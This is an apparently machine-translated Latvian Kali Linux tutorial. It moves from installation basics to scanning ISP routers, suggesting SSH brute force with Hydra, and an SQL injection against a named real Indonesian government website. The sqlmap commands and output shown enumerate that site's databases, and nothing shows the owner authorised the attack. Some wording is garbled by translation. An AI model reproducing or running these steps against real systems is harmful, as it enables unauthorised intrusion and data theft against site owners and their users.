Kali Linux apmācība

Kali Linux Tutorial



Ja esat eksperts vai vismaz pārzināt Linux, komandas un vidi, tikko savā datorā instalēju Kali Linux, vēlējāties kļūt par Kali Linux meistaru vai ētisku hakeru, tad esat īstajā vietā. Šajā rakstā es aplūkošu Kali Linux apmācību Linux lietotājiem, kuri vēl nav pazīstami ar Kali, un iepazīstināšu jūs ar dažām pamata metodēm, kas tiek izmantotas hakeru un drošības pārbaudei, izmantojot Kali.

Kas ir Kali Linux?

Kali Linux, ( pirmoreiz izlaists 2013. gada 13. martā ), kas oficiāli bija pazīstams kā BackTrack, ko izstrādāja drošības firma Offensive Security, ir kriminālistikas un uz drošību vērsta izplatīšana, kuras pamatā ir Debian testēšanas filiāle. Kali Linux ir izstrādāts, ņemot vērā iespiešanās pārbaudi, datu atkopšanu un draudu noteikšanu. Projekts šī gada sākumā tika pārcelts uz slīdošo izlaišanas modeli, cenšoties izplatītāja lietotājiem nodrošināt jaunākus drošības pakalpojumus. Kali Linux ir bezmaksas un vienmēr būs. Tajā ir iekļauti vairāk nekā 600 iespiešanās pārbaudes rīki.







Kāpēc Kali Linux? Vai tas jums ir piemērots?

Kali Linux pēdējā laikā ir ieguvusi lielu popularitāti. Un tam ir iemesls. Datorurķēšana ir atgriezusies kā populārā kultūra, un to var būtiski attiecināt uz seriālu Mr Robot. Robota kunga popularitāte palīdzēja Kali Linux iegūt jaunus lietotājus. Cilvēki, kuriem gandrīz nav zināšanu par Linux vai jebko, kas saistīts ar datoru drošību, tagad mēģina izmantot Kali kā galveno Linux izplatīšanu.



Mūsu visu laiku progresīvākais iespiešanās pārbaudes sadalījums. - Kali Linux izstrādātāji. (Tas ir rakstīts Kali.org galvenajā lapā lapas augšpusē.) Ko jūs iegūstat no šī paziņojuma? Vai pamanāt šo: APTD (Advanced Penetration Testing Distribution)? Šeit burtiski nav terminu hakeru. Kali Linux ir tāds pats kā citi Linux izplatījumi. Vienkārši sakot, tas ir Linux izplatījums, kas ir aprīkots ar ar drošību saistītiem rīkiem un ir paredzēts tīkla un datoru drošības ekspertiem. Tomēr Kali Linux izmantošana koncentrējas tikai uz drošību un kriminālistiku.



Linux izplatīšana ir nekas cits kā komplekts, kas satur Linux kodolu, galveno utilītu un lietojumprogrammu kopumu un dažus noklusējuma iestatījumus. Tātad, Kali Linux nepiedāvā kaut ko unikālu šajā ziņā, lielāko daļu piedāvāto rīku var instalēt jebkurā Linux izplatīšanā.





Kali Linux ir īpaši pielāgots profesionālās iespiešanās pārbaudes un drošības audita prasībām. Tas ir paredzēts noteiktai Linux lietotāju apakškopai. Pentesters, hakeri uc .

LIETOŠANAS PĒC KALI LINUX UZSTĀDĪŠANAS

Pēc Kali Linux instalēšanas jums var rasties jautājums, ko ar to darīt tālāk, vai ne? Ikviens saskaras ar šo problēmu, neuztraucieties.



1. SOLIS: IESTATIET KRĀTU

Pirmkārt, jūs, iespējams, to jau zināt, taču ir ļoti svarīgi pareizi iestatīt repozitoriju. Kā jau teicu, Kali Linux slīdošās versijas modelis cenšas izplatītāja lietotājiem nodrošināt jaunākus drošības utilītus. Parasti, ja jums ir tikko instalēta Kali Linux, krātuve atsaucas uz multividi, kuru izmantojat instalēšanai. Lai to labotu, jums ir jāmaina krātuve uz oficiālo Kali Linux repozitoriju. Nepieciešamais fails atrodas zem /etc/apt/sources.list . Atveriet failu ar lapu tastatūras teksta redaktoru un nomainiet noklusējuma repozitoriju uz šo oficiālo Kali Rolling repozitoriju:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

2. SOLIS: KALI LINUX ATJAUNINĀT UN ATJAUNINĀT

Pēc šīs sistēmas atjaunināšanas un jaunināšanas sinhronizējiet savu Kali Linux ar jaunāko versiju. Lai to izdarītu, atveriet termināli un ierakstiet:

apt update -y && apt upgrade -y && apt dist-upgrade 

Komanda apt update lejupielādē un ielādē paketes sarakstu ar informāciju no krātuvēm un atjaunina tās, lai iegūtu informāciju par pakotņu jaunākajām versijām un to atkarībām.

Piemērotā jaunināšanas komanda lejupielādē un instalē instalēto Kali Linux pakotņu pakotņu jaunāku versiju, ja vien tajā nav kļūdu atkarībā.

Apt dist-upgrade atjauninās visas paketes uz jaunāko pieejamo versiju neatkarīgi no tā. Un pēc vajadzības instalējiet un noņemiet atkarības (acīmredzot instalējiet atkarības, lai apmierinātu paketes, bet arī noņemiet atkarības, kas palikušas bāreņos, ja atjauninātajai pakotnei šī atkarība vairs nav nepieciešama.

PAMATPENETRĀCIJAS TESTĒŠANAS KONCEPCIJA AR KALI LINUX

Kad esat veiksmīgi veicis šīs darbības, ir trīs galvenās lietas, ko varat darīt ar Kali Linux, pamatojoties uz mērķa sistēmu, tostarp:

  1. Bezvadu tīkla uzlaušana - Wifi uzlaušana, pikšķerēšana, ARP saindēšanās utt.
  2. Tīmekļa lietotņu uzlaušana -SQL iesmidzināšana, vairāku vietņu pieprasījumu viltošana (CSRF), tīmekļa phising utt.
  3. Ierīču uzlaušana - Izmantojiet mērķa mašīnu, lai to kontrolētu.

Es neietveru IoT uzlaušanu, tas nenozīmē, ka Kali Linux nav iespēju šim nolūkam. Bet burtiski tas varētu piederēt arī ierīču uzlaušanai. Tā kā ierīcei ir fizisks izskats un forma. Šajā apmācībā es apskatīju pamatzināšanas par tām. Tā kā Kali Linux ir milzīgs, tas neietilpst vienā rakstā!

Jums arī jāzina iespiešanās pārbaudes cikls vai procedūra. Viņi ir:

  1. Iepazīšanās - informācijas vākšana
  2. Skenēšana
  3. Darbība
  4. Pēcizmantošana

BEZVADU TĪKLA UZZRAUŠANA AR KALI LINUX

Runājot par bezvadu tīkla uzlaušanu, upuris var atšķirties. Tā kā bezvadu tīkli sastāv no vairākām lietām, piemēram, ISP (interneta pakalpojumu sniedzējs), maršrutētāja un tā biedriem (modems, centrmezgls, slēdzis utt.) Un klientiem (lietotājiem, videonovērošanas sistēmai, attālajam datoram utt.). Viņiem ir arī neaizsargātas iespējas.

Internets ir liels un sarežģīts tīkla aparatūras kopums, kas savienots kopā ar vārtejām. Paku maršruta izsekošana ir svarīga, lai zinātu, kā jūs sasniedzat noteiktu resursdatora nosaukumu vai mērķa IP adresi.

Kali Linux ir iebūvēts rīks ar nosaukumu Traceroute. Traceroute izmanto IP protokola laiku, lai dzīvotu laukā, un mēģina iegūt ICMP TIME_EXCEEDED atbildi no katras vārtejas ceļā uz kādu saimniekdatoru. Traceroute mēģina izsekot maršrutam, ko kādam interneta resursdatoram sekotu IP pakete, palaižot zondes paketes ar nelielu TTL (laiks dzīvot), pēc tam noklausoties ICMP laika pārsniegto atbildi no vārtejas. Es sniegšu jums piemēru, kā izsekot ISP maršrutētājam, kas tiek izmantots mūsu savienojuma apstrādei, izmantojot Traceroute.

1. Atzīšana

Informācijas vākšana ir vissvarīgākais sākums, nepalaidiet garām šo soli. Šajā solī mūsu mērķis ir iegūt pēc iespējas vairāk noderīgas informācijas, ko mēs varētu iegūt, un tad šī informācija tiek izmantota turpmākajām darbībām.

Vispirms atveriet termināli un ierakstiet šo komandu, lai sāktu izsekot ceļu uz vietni, šajā gadījumā es iestatīju vietni uz google.com.

traceroute google.com 

Traceroute ekrānuzņēmums

2. Skenēšana

Tiklīdz mēs palaidīsim komandas, tajā tiks uzskaitīts, kur mūsu pakete nonāk secībā. Kā redzat iepriekš, man ir 3 apiņi, no kuriem viens ir mans ISP serveris. Pirmais IP sarakstā ir mans maršrutētājs, kas darbojas kā vārteja. Un nākamie divi no tiem pieder manam ISP. Tagad pārbaudīsim pakalpojumu, ko viņi izmanto, izmantojot Nmap. Tātad, mērķi, kurus mēs skenēsim, ir 10.152.192.1 un 10.13.223.102 . Terminālī es izpildīju šādu komandu:

nmap -v -sS [IP Target] -Pn 

Sadalīsim komandas argumentu:

-v = Iespējot daudzpusības režīmu

-sS = Izmantojiet TCP SYN skenēšanas tehniku

-Pn = Izturieties pret visiem saimniekiem kā tiešsaistē -izlaidiet saimniekdatora atklāšanu

Un šeit ir rezultāts, ko mēs saņēmām.

nmap ekrānuzņēmums 2

Diemžēl visas ostas ir ieslēgtas 10.152.192.1 tiek filtrēti, tas nozīmē, ka visus ienākošos TCP savienojumus šajā IP bloķē IDS vai ugunsmūris. Tagad ļaujiet vēlreiz skenēt otro mērķi.

nmap ekrānuzņēmums 1

3. Darbība

Šajā procedūrā man nav paredzēts veikt reālu ekspluatāciju, bet es jums parādīšu, kā. Pamatojoties uz iepriekš minēto Nmap skenēšanas rezultātu, mēs zinām, ka šim IP adresei ir SSH serveris, kas darbojas 22. portā, un tas ir atvērts. Tas ir atvērts bruteforced, haha! Mēs atradām caurumu, šis SSH serveris ir iespējamais caurums, kuram mēs varētu mēģināt piekļūt. Kali Linux ir vairāki rīki, kas atbalsta bruteforce vai vārdnīcas uzbrukumus SSH protokolam. Viens no populārākajiem un spēcīgākajiem ir Hydra.

Labi, tā bija pamata procedūra, lai veiktu iespiešanās testu pret mērķētu serveri, kas mūsu piemērā šeit ir mans ISP serveris.

TĪMEKLISKĀS LIETOTNES UZLABOT AR KALI LINUX

Patiesībā, ja jūs aizraujaties ar to, jūs varat izveidot savu uzlaušanas vidi, instalējot DWVA (sasodīti ievainojamā tīmekļa lietotne) savā Kali Linux. Tā ir PHP/MySQL tīmekļa lietojumprogramma, kurā ir daudz neaizsargātu caurumu. Tās galvenie mērķi ir būt palīglīdzeklim drošības speciālistiem, lai pārbaudītu savas prasmes un rīkus likumīgā vidē, un palīdzēt tīmekļa izstrādātājiem labāk izprast tīmekļa lietojumprogrammu drošības procesus. Jūs varat bez maksas iegūt DWVA vietnē Github: https://github.com/ethicalhack3r/DVWA.

Pagaidām es jums parādīšu, kā reālajā vietnē veikt tīmekļa lietotņu uzlaušanu. Bet apsoliet man, ka tas attiecas tikai uz izglītojošiem mērķiem. Mēs simulēsim reālu uzbrukumu reālai vietnei, izmantojot SQL injekciju.

Priekšnosacījums

Aptvertie rīki:

-Whatweb (iepriekš instalēts)

-Nmap (iepriekš instalēts)

- SQLiv (instalēt manuāli)

-SQLMap (iepriekš instalēts)

Mums ir nepieciešams vēl viens papildu rīks, kas pieejams vietnē Github: https://github.com/Hadesy2k/sqliv, vispirms instalējiet to mūsu Kali Linux. Šis rīks ar nosaukumu SQLiv, kas spēj veikt mērķtiecīgu skenēšanu, nodrošinot noteiktu domēnu (ar pārmeklēšanu). Ierakstiet terminālī:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Mērķis: www.trenggalekkab.go.id

1. Atzīšana

Savāc pēc iespējas vairāk noderīgas informācijas. Mēs varētu atvērt tīmekļa lapu un noteikt, kāda lietojumprogramma darbojas šajā vietnē. Vispirms pārbaudiet, kāda veida vietne tā ir. Mēs to darīsim, izmantojot tīmekli.

whatweb www.trenggalekkab.go.id 

Kāds tīmekļa ekrānuzņēmums

Kā redzat iepriekš redzamo rezultātu, mērķis atrodas Indonēzijā. Tas darbojas Apache v2.2.27 savā tīmekļa serverī, kā arī ir PHP v5.4.31 , tai ir IP adrese 103.247.21.142 . Labi, ņemiet to vērā. Jums, iespējams, vajadzēs apmeklēt tās tīmekļa vietni, meklējot izveidoto failu vai lapu, URL parametrus vai pat pieteikšanās veidlapu. Pagaidām šī IP adrese ir nepieciešama nākamajam skenēšanas posmam.

2. Skenēšana

Tāpat kā iepriekš, mēs atkal izmantojam Nmap, lai skenētu, kuras ostas un pakalpojumi darbojas mērķī.

nmap -v -sS 103.247.21.142 

Un šeit ir rezultāts, ko mēs saņēmām:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Ir virkne atvērtu portu, kas apstrādā katru mērķa pakalpojumu, taču uzkrītošs ir tas, ka mysql pakalpojums portā 3306. Tiek norādīts, ka šī vietne izmanto mysql pārvaldīt savu informāciju datu bāzēs. Tad es domāju, vai šajā vietnē ir kādas SQL injekcijas ievainojamības. Tātad, es vēlreiz skenēju vietni, izmantojot tikko instalēto SQLiv. Es ierakstīju komandu:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ekrānuzņēmums1

Šajā vietnē mēs atradām 2 iespējamos SQL neaizsargātos URL. Pierakstiet šos URL.

3. Darbība

Labi, mums ir SQL neaizsargāti URL un esam gatavi izpildei. Lai to izdarītu, mēs izmantosim SQLMap. Sintakse ir šāda:

sqlmap [Vulnerable URL] --dbs 

Komandai vajadzētu izskatīties šādi:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Arguments –dbs ir likt SQLMap iegūt mērķa datu bāzes. Šeit ir rezultāts, ko mēs saņēmām:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap atrada 2 datu bāzes, bet tikai vienu no tām, kas satur sensitīvus datus, piemēram, administratora akreditācijas kontu. Tas ir vietnē trengkab_trg. Pēc datu bāzu atrašanas mums vēl ir jādara vēl viens solis. Tas ir, lai atrastu tabulas un kolonnas, un pēdējais solis ir izgāzt datus. Es jums nerādīšu, kā šajā sadaļā, izmantojot šo mērķi. Vismaz jūs zināt pamatideju par uzbrukuma ciklu un dažu rīku izmantošanu.

IERĪCES UZLAUŠANA

Turpmākajā šīs vietnes rakstā mēs apskatīsim ierīču uzlaušanu, sekojiet līdzi. Iepriekš brīdinot, jūs vēlēsities pārliecināties, ka zināt kādu Python.